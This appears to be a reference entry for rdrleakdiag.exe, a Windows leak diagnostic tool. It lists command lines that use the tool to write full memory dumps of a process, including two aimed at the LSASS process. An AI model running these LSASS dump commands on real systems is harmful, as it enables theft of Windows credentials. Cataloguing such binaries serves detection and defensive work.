rdrleakdiag.exe

Microsoft Windows resource leak diagnostic tool

Paths

  • c:\windows\system32\rdrleakdiag.exe
  • c:\Windows\SysWOW64\rdrleakdiag.exe

Commands

Dump

Dump process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).

Use case: Dump process by PID.

Privileges: User

rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1

Dump

Dump LSASS process by PID and create a dump file (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).

Use case: Dump LSASS process.

Privileges: Administrator

rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1

Dump

After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_<PID>.dmp` and `results_<PID>.hlk`).

Use case: Dump LSASS process mutliple times.

Privileges: Administrator

rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap

Detection

Resources